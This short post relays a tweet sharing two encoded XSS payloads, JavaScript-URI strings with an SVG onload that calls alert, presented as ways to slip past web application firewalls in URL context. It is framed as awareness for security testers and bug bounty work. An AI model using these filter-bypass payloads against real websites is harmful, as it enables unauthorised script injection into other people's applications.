A tweet by @BRuteLogic highlights a XSS bypass payload that can be used in URL context. The payload is JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>". This payload can potentially bypass various WAFs. It is important for security professionals to be aware of such payloads and ensure proper protection measures are in place to mitigate XSS vulnerabilities in web applications. #xss #cybersecurity #BugBounty #pentest #Coding
Always look everything: payloads to bypass WAF in URL context, by@BRuteLogic
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
JavaScript:"%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"#xss #cybersecurity #BugBounty #pentest #Coding https://t.co/zhBgJ5Hqe3
— Seke4l (@seke4l) December 8, 2024